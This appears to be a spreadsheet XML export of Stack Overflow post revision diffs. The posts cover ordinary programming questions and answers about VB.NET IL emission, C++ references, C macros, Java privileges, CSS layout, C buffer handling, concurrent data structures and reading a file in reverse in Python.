Private Sub AddCtor(ByVal type As TypeBuilder, ByVal gen As ILGenerator, ByVal FieldBuilderRef As FieldBuilder, ByVal TypeToReference As Type)_x000D_
    Dim TypeCtor = TypeToReference.GetConstructor(BindingFlags.Instance Or BindingFlags.[Public] Or BindingFlags.NonPublic, Nothing, New Type() {}, Nothing)_x000D_
    gen.Emit(OpCodes.Ldarg_0)_x000D_
    gen.Emit(OpCodes.Newobj, TypeCtor)_x000D_
    gen.Emit(OpCodes.Stfld, FieldBuilderRef)_x000D_
End Sub_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Code takes in a dictionary of type , fieldbuilder to emit in the ctor. to new up the fields built earlier in the typebuilder main routine&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ori</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In C++, is it safe to extend scope via a reference?&lt;/p&gt; _x000D_
 &lt;p&gt; In code, what I mean is:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; 1)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;MyCLass&amp;amp; function badIdea()_x000D_
{_x000D_
    MyClass obj1;_x000D_
    ..._x000D_
    return obj1;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;std::string s1 = "123";_x000D_
std::string s2 = "456";_x000D_
std::string s3_copy = s1 + s2;_x000D_
const std::string&amp;amp; s3_reference = s1 + s2;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In C++, is it safe to extend scope via a reference?&lt;/p&gt; _x000D_
 &lt;p&gt; In code, what I mean is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;MyCLass&amp;amp; function badIdea()_x000D_
{_x000D_
    MyClass obj1;_x000D_
    ..._x000D_
    return obj1;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
 &lt;p&gt; I've been seeing that expression for over 10 years now. I've been trying to think what it's good for. Since I see it mostly in #defines, I assume it's good for inner scope variable declaration and for using breaks (instead of gotos.)&lt;/p&gt; _x000D_
 &lt;p&gt; Is it good for anything else? Do you use it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Possible Duplicate:&lt;/span&gt;&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/154136/why-are-there-sometimes-meaningless-do-while-and-if-else-statements-in-c-c-macr"&gt;&lt;span class="diff-add"&gt;Why are there sometimes meaningless do/while and if/else statements in C/C++ macros?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I've been seeing that expression for over 10 years now. I've been trying to think what it's good for. Since I see it mostly in #defines, I assume it's good for inner scope variable declaration and for using breaks (instead of gotos.)&lt;/p&gt; _x000D_
 &lt;p&gt; Is it good for anything else? Do you use it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>sbi</t>
  </si>
  <si>
    <t>Tofeeq Ahmad</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When I try to create a new task in the task scheduler via the Java ProcessBuilder class I get an access denied error an Windows Vista. On XP it works just fine.&lt;/p&gt; _x000D_
 &lt;p&gt; When I use the "Run as adminstrator" option it runs on Vista as well.&lt;/p&gt; _x000D_
 &lt;p&gt; However this is a additional step requeried an the users might not know about this. When the user just double clicks on the app icon it will fail with access denied. My question is how can I force a java app to reuest admin privileges right after startup?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When I try to create a new task in the task scheduler via the Java ProcessBuilder class I get an access denied error an Windows Vista. On XP it works just fine.&lt;/p&gt; _x000D_
 &lt;p&gt; When I use the "Run as adminstrator" option it runs on Vista as well&lt;span class="diff-add"&gt;.&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; However this is a additional step requeried an the users might not know about this. When the user just double clicks on the app icon it will fail with access denied. My question is how can I force a java app to reuest admin privileges right after startup?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>dkp</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Java is nearing version 7 ... I occurs to me that there there must be plenty of textbooks and training manuals kicking around that teach methods based on older versions of Java; where the methods taught, would have far better solutions now ....&lt;/p&gt; _x000D_
 &lt;br&gt; _x000D_
 &lt;span class="diff-delete"&gt; ###What are some boilerplate code situations, especially ones that you see people implement through force of habit, that you find yourself refactoring to utilise the latest versions of Java? &lt;/span&gt; _x000D_
 &lt;br&gt; _x000D_
 &lt;span class="diff-delete"&gt;###This also leads me to ask: ###Are you wary of writing for the newer versions of Java because of compatiblity? &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Java is nearing version 7 ... I occurs to me that there there must be plenty of textbooks and training manuals kicking around that teach methods based on older versions of Java; where the methods taught, would have far better solutions now ....&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; ###What are some boilerplate code situations, especially ones that you see people implement through force of habit, that you find yourself refactoring to utilise the latest versions of Java?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>unwind</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I can't get the inner div (with Hello World) to fit inside the "box" div in this code example (also at &lt;a href="http://www.toad-software.com/test.html" rel="nofollow noreferrer"&gt;http://www.toad-software.com/test.html&lt;/a&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; Despite the body being set to 100%, the inner div will not be contained! This is a test case for a larger project in which a variable-width table exceeds the boundaries of its container. The table would be in the inner div and the container would the "box."&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&amp;gt;_x000D_
&amp;lt;html&amp;gt;_x000D_
&amp;lt;head&amp;gt;_x000D_
    &amp;lt;style type="text/css"&amp;gt;_x000D_
        /*html { width: 100%; height: 100%; position: relative; background: #c0c0c0; }_x000D_
        body { position: absolute; width: 100%; height: 100%; background: #f9f9f9; }*/_x000D_
        _x000D_
        body, html { margin: 0; padding: 0; }_x000D_
        _x000D_
        body_x000D_
        {_x000D_
            width: 100%;_x000D_
        }_x000D_
        _x000D_
        div.box_x000D_
        {_x000D_
            padding: 10px;_x000D_
            background: #ff33ff;_x000D_
        }_x000D_
        _x000D_
    &amp;lt;/style&amp;gt;_x000D_
&amp;lt;/head&amp;gt;_x000D_
&amp;lt;body&amp;gt;_x000D_
    &amp;lt;div class="box"&amp;gt;_x000D_
        &amp;lt;div style="width: 1500px; height: 900px; background: #f12;"&amp;gt;Hello World&amp;lt;/div&amp;gt;_x000D_
    &amp;lt;/div&amp;gt;_x000D_
&amp;lt;/body&amp;gt;_x000D_
&amp;lt;/html&amp;gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I can't get the inner div (with Hello World) to fit inside the "box" div in this code example (also at &lt;a href="http://www.toad-software.com/test.html" rel="nofollow noreferrer"&gt;http://www.toad-software.com/test.html&lt;/a&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; Despite the body being set to 100%, the inner div will not be contained! This is a test case for a larger project in which a variable-width table exceeds the boundaries of its container. The table would be in the inner div and the container would the "box."&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
_x000D_
_x000D_
_x000D_
    _x000D_
        /*html { width: 100%; height: 100%; position: relative; background: #c0c0c0; }_x000D_
        body { position: absolute; width: 100%; height: 100%; background: #f9f9f9; }*/_x000D_
        _x000D_
        body, html { margin: 0; padding: 0; }_x000D_
        _x000D_
        body_x000D_
        {_x000D_
            width: 100%;_x000D_
        }_x000D_
        _x000D_
        div.box_x000D_
        {_x000D_
            padding: 10px;_x000D_
            background: #ff33ff;_x000D_
        }_x000D_
        _x000D_
    _x000D_
_x000D_
_x000D_
    _x000D_
        Hello World_x000D_
    _x000D_
_x000D_
_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Caveatrob</t>
  </si>
  <si>
    <t>warren</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; ###Duplicate:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/121724/where-can-i-find-free-wpf-controls-and-control-templates"&gt;&lt;span class="diff-delete"&gt;Where can I find free WPF controls and control templates?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I'm not a designer, so I'm looking for some free WPF themes.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Where can I find some good WPF themes&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm not a designer, so I'm looking for some free WPF themes.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Any suggestions&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You'll have to forgive my ignorance, but I'm not used to using wide character sets in c++, but is there a way that I can use wide string literals in c++ without putting an L in front of each literal?&lt;/p&gt; _x000D_
 &lt;p&gt; If so, how?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Edit:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; The compiler is MS VC++ 2005&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You'll have to forgive my ignorance, but I'm not used to using wide character sets in c++, but is there a way that I can use wide string literals in c++ without putting an L in front of each literal?&lt;/p&gt; _x000D_
 &lt;p&gt; If so, how?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Fry</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Consider the following simple C program that read a file into a buffer and displays that buffer to the console:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include&amp;lt;stdio.h&amp;gt;_x000D_
_x000D_
main()_x000D_
{_x000D_
  FILE *file;_x000D_
    char *buffer;_x000D_
    unsigned long fileLen;_x000D_
    //Open file_x000D_
    file = fopen("HelloWorld.txt", "rb");_x000D_
    if (!file)_x000D_
    {_x000D_
        fprintf(stderr, "Unable to open file %s", "HelloWorld.txt");_x000D_
        return;_x000D_
    }_x000D_
    //Get file length_x000D_
    fseek(file, 0, SEEK_END);_x000D_
    fileLen=ftell(file);_x000D_
    fseek(file, 0, SEEK_SET);_x000D_
    //Allocate memory_x000D_
    buffer=(char *)malloc(fileLen+1);_x000D_
    if (!buffer)_x000D_
    {_x000D_
        fprintf(stderr, "Memory error!");_x000D_
        fclose(file);_x000D_
        return;_x000D_
    }_x000D_
    //Read file contents into buffer_x000D_
    fread(buffer, fileLen, 1, file);_x000D_
    //Send buffer contents to stdout_x000D_
    printf("%s\n",buffer);    _x000D_
    fclose(file);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The file it will read simply contains:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Hello World!&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; The output is:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Hello World!Â²Â²Â²Â²â–Œâ–Œâ–Œâ–Œâ–Œâ–Œâ–Œâ†”â˜º&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; It has been a while since I did anything significant in C/C++, but normally I would assume the buffer was being allocated larger than necessary, but this does not appear to be the case.&lt;/p&gt; _x000D_
 &lt;p&gt; fileLen ends up being 12, which is accurate.&lt;/p&gt; _x000D_
 &lt;p&gt; I am thinking now that I must just be displaying the buffer wrong, but I am not sure what I am doing wrong.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Consider the following simple C program that read a file into a buffer and displays that buffer to the console:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include&amp;lt;stdio.h&amp;gt;_x000D_
_x000D_
main()_x000D_
{_x000D_
  FILE *file;_x000D_
    char *buffer;_x000D_
    unsigned long fileLen;_x000D_
    //Open file_x000D_
    file = fopen("HelloWorld.txt", "rb");_x000D_
    if (!file)_x000D_
    {_x000D_
        fprintf(stderr, "Unable to open file %s", "HelloWorld.txt");_x000D_
        return;_x000D_
    }_x000D_
    //Get file length_x000D_
    fseek(file, 0, SEEK_END);_x000D_
    fileLen=ftell(file);_x000D_
    fseek(file, 0, SEEK_SET);_x000D_
    //Allocate memory_x000D_
    buffer=(char *)malloc(fileLen+1);_x000D_
    if (!buffer)_x000D_
    {_x000D_
        fprintf(stderr, "Memory error!");_x000D_
        fclose(file);_x000D_
        return;_x000D_
    }_x000D_
    //Read file contents into buffer_x000D_
    fread(buffer, fileLen, 1, file);_x000D_
    //Send buffer contents to stdout_x000D_
    printf("%s\n",buffer);    _x000D_
    fclose(file);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The file it will read simply contains:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Hello World!&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; The output is:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Hello World!Â²Â²Â²Â²â–Œâ–Œâ–Œâ–Œâ–Œâ–Œâ–Œâ†”â˜º&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; It has been a while since I did anything significant in C/C++, but normally I would assume the buffer was being allocated larger than necessary, but this does not appear to be the case.&lt;/p&gt; _x000D_
 &lt;p&gt; fileLen ends up being 12, which is accurate.&lt;/p&gt; _x000D_
 &lt;p&gt; I am thinking now that I must just be displaying the buffer wrong, but I am not sure what I am doing wrong.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Can anyone clue me in to what I am doing wrong?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Scott Evernden</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Skip lists are more amenable to concurrent access/modification. Herb Sutter wrote an &lt;a href="http://www.ddj.com/hpc-high-performance-computing/208801371" rel="nofollow noreferrer"&gt;article&lt;/a&gt; about data structure in concurrent environments. It has more indepth information.&lt;/p&gt; _x000D_
 &lt;h2&gt;The most frequently used implementation of a binary search tree is a &lt;a href="http://en.wikipedia.org/wiki/Red-black_tree" rel="nofollow noreferrer"&gt;red-black tree&lt;/a&gt;. The concurrent problems come in when the tree is modified it often needs to rebalance. The rebalance operation can affect large portions of the tree, which would require a mutex lock on many of the tree nodes. Inserting a node into a skip list is far more localized, only nodes directly linked to the affected node need to be locked.&lt;/h2&gt; _x000D_
 &lt;p&gt; Update from Jon Harrops comments&lt;/p&gt; _x000D_
 &lt;p&gt; I read Fraser and Harris's latest paper &lt;a href="http://www.cl.cam.ac.uk/netos/papers/2007-cpwl.pdf" rel="nofollow noreferrer"&gt;Concurrent programming without locks&lt;/a&gt;. Really good stuff if you're interested in lock-free data structures. The paper focuses on &lt;a href="http://en.wikipedia.org/wiki/Transactional_memory" rel="nofollow noreferrer"&gt;Transactional Memory&lt;/a&gt; and a theoretical operation multiword-compare-and-swap MCAS. Both of these are simulated in software as no hardware supports them yet. I'm fairly impressed that they were able to build MCAS in software at all.&lt;/p&gt; _x000D_
 &lt;p&gt; I didn't find the transactional memory stuff particularly compelling as it requires a garbage collector. Also &lt;a href="http://en.wikipedia.org/wiki/Software_transactional_memory" rel="nofollow noreferrer"&gt;software transactional memory&lt;/a&gt; is plagued with performance issues. However, I'd be very excited if hardware transactional memory ever becomes common. In the end it's still research and won't be of use for production code for another decade or so.&lt;/p&gt; _x000D_
 &lt;p&gt; In section 8.2 they compare the performance of several concurrent tree implementations. I'll summarize their findings. It's worth it to download the pdf as it has some very informative graphs on pages 50, 53, and 54.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Locking skip lists&lt;/strong&gt; are insanely fast. They scale incredibly well with the number of concurrent accesses. This is what makes skip lists special, other lock based data structures tend to croak under pressure.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Lock-free skip lists&lt;/strong&gt; are consistently faster than locking skip lists but only barely.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;transactional skip lists&lt;/strong&gt; are consistently 2-3 times slower than the locking and non-locking versions.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;locking red-black trees&lt;/strong&gt; croak under concurrent access. Their performance degrades linearly with each new concurrent user. Of the two known locking red-black tree implementations, one essentially has a global lock during tree rebalancing. The other uses fancy (and complicated) lock escalation but still doesn't significantly out perform the global lock version.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;lock-free red-black trees&lt;/strong&gt; &lt;span class="diff-delete"&gt;See the 2011 article: &lt;/span&gt;&lt;a href="http://www.cs.umanitoba.ca/%7Ehacamero/Research/RBTreesKim.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Lock-Free Red-Black Trees Using CAS&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;transactional red-black trees&lt;/strong&gt; are comparable with transactional skip-lists. That was very surprising and very promising. Transactional memory, though slower if far easier to write. It can be as easy as quick search and replace on the non-concurrent version.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Skip lists are more amenable to concurrent access/modification. Herb Sutter wrote an &lt;a href="http://www.ddj.com/hpc-high-performance-computing/208801371" rel="nofollow noreferrer"&gt;article&lt;/a&gt; about data structure in concurrent environments. It has more indepth information.&lt;/p&gt; _x000D_
 &lt;h2&gt;The most frequently used implementation of a binary search tree is a &lt;a href="http://en.wikipedia.org/wiki/Red-black_tree" rel="nofollow noreferrer"&gt;red-black tree&lt;/a&gt;. The concurrent problems come in when the tree is modified it often needs to rebalance. The rebalance operation can affect large portions of the tree, which would require a mutex lock on many of the tree nodes. Inserting a node into a skip list is far more localized, only nodes directly linked to the affected node need to be locked.&lt;/h2&gt; _x000D_
 &lt;p&gt; Update from Jon Harrops comments&lt;/p&gt; _x000D_
 &lt;p&gt; I read Fraser and Harris's latest paper &lt;a href="http://www.cl.cam.ac.uk/netos/papers/2007-cpwl.pdf" rel="nofollow noreferrer"&gt;Concurrent programming without locks&lt;/a&gt;. Really good stuff if you're interested in lock-free data structures. The paper focuses on &lt;a href="http://en.wikipedia.org/wiki/Transactional_memory" rel="nofollow noreferrer"&gt;Transactional Memory&lt;/a&gt; and a theoretical operation multiword-compare-and-swap MCAS. Both of these are simulated in software as no hardware supports them yet. I'm fairly impressed that they were able to build MCAS in software at all.&lt;/p&gt; _x000D_
 &lt;p&gt; I didn't find the transactional memory stuff particularly compelling as it requires a garbage collector. Also &lt;a href="http://en.wikipedia.org/wiki/Software_transactional_memory" rel="nofollow noreferrer"&gt;software transactional memory&lt;/a&gt; is plagued with performance issues. However, I'd be very excited if hardware transactional memory ever becomes common. In the end it's still research and won't be of use for production code for another decade or so.&lt;/p&gt; _x000D_
 &lt;p&gt; In section 8.2 they compare the performance of several concurrent tree implementations. I'll summarize their findings. It's worth it to download the pdf as it has some very informative graphs on pages 50, 53, and 54.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Locking skip lists&lt;/strong&gt; are insanely fast. They scale incredibly well with the number of concurrent accesses. This is what makes skip lists special, other lock based data structures tend to croak under pressure.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Lock-free skip lists&lt;/strong&gt; are consistently faster than locking skip lists but only barely.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;transactional skip lists&lt;/strong&gt; are consistently 2-3 times slower than the locking and non-locking versions.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;locking red-black trees&lt;/strong&gt; croak under concurrent access. Their performance degrades linearly with each new concurrent user. Of the two known locking red-black tree implementations, one essentially has a global lock during tree rebalancing. The other uses fancy (and complicated) lock escalation but still doesn't significantly out perform the global lock version.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;lock-free red-black trees&lt;/strong&gt; &lt;span class="diff-add"&gt;don't exist.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;transactional red-black trees&lt;/strong&gt; are comparable with transactional skip-lists. That was very surprising and very promising. Transactional memory, though slower if far easier to write. It can be as easy as quick search and replace on the non-concurrent version.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>deft_code</t>
  </si>
  <si>
    <t>A T</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's an answer like MizardX's, but without its apparent problem of taking quadratic time in the worst case from rescanning the working string repeatedly for newlines as chunks are added.&lt;/p&gt; _x000D_
 &lt;p&gt; Compared to the activestate solution (which also seems to be quadratic), this doesn't blow up given an empty file, and does one seek per block read instead of two.&lt;/p&gt; _x000D_
 &lt;p&gt; Compared to spawning 'tail', this is self-contained. (But 'tail' is best if you have it.)&lt;/p&gt; _x000D_
 &lt;p&gt; Compared to grabbing a few kB off the end and hoping it's enough, this works for any line length.&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; os_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;reversed_lines&lt;/span&gt;(&lt;span class="hljs-params"&gt;file&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-string"&gt;"Generate the lines of file in reverse order."&lt;/span&gt;_x000D_
    tail = []           &lt;span class="hljs-comment"&gt;# Tail of the line whose head is not yet read.&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; block &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; reversed_blocks(file):_x000D_
        &lt;span class="hljs-comment"&gt;# A line is a list of strings to avoid quadratic concatenation.&lt;/span&gt;_x000D_
        &lt;span class="hljs-comment"&gt;# (And trying to avoid 1-element lists would complicate the code.)&lt;/span&gt;_x000D_
        linelists = [[line] &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; line &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; block.splitlines()]_x000D_
        &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; block &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; block[-&lt;span class="hljs-number"&gt;1&lt;/span&gt;] &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; (&lt;span class="hljs-string"&gt;'\r'&lt;/span&gt;,&lt;span class="hljs-string"&gt;'\n'&lt;/span&gt;):_x000D_
            linelists.extend(tail)_x000D_
        &lt;span class="hljs-keyword"&gt;else&lt;/span&gt;:_x000D_
            &lt;/span&gt;linelists[-&lt;span class="hljs-number"&gt;1&lt;/span&gt;].extend(tail)_x000D_
        &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; linelist &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; &lt;span class="hljs-built_in"&gt;reversed&lt;/span&gt;(linelists[&lt;span class="hljs-number"&gt;1&lt;/span&gt;:]):_x000D_
            &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; &lt;span class="hljs-string"&gt;''&lt;/span&gt;.join(linelist)_x000D_
        tail = linelists[&lt;span class="hljs-number"&gt;0&lt;/span&gt;]_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; tail: &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; &lt;span class="hljs-string"&gt;''&lt;/span&gt;.join(tail)_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;reversed_blocks&lt;/span&gt;(&lt;span class="hljs-params"&gt;file, blocksize=&lt;span class="hljs-number"&gt;4096&lt;/span&gt;&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-string"&gt;"Generate blocks of file's contents in reverse order."&lt;/span&gt;_x000D_
    file.seek(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, os.SEEK_END)_x000D_
    here = file.tell()_x000D_
    &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; &lt;span class="hljs-number"&gt;0&lt;/span&gt; &amp;lt; here:_x000D_
        delta = &lt;span class="hljs-built_in"&gt;min&lt;/span&gt;(blocksize, here)_x000D_
        file.seek(here - delta, os.SEEK_SET)_x000D_
        &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; file.read(delta)_x000D_
        here -= delta_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To use it as requested:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; itertools &lt;span class="hljs-keyword"&gt;import&lt;/span&gt; islice_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;check_last_10_lines&lt;/span&gt;(&lt;span class="hljs-params"&gt;file, key&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; line &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; islice(reversed_lines(file), &lt;span class="hljs-number"&gt;10&lt;/span&gt;):_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; line == key:_x000D_
            &lt;span class="hljs-built_in"&gt;print&lt;/span&gt; &lt;span class="hljs-string"&gt;'FOUND'&lt;/span&gt;_x000D_
            &lt;span class="hljs-keyword"&gt;break&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
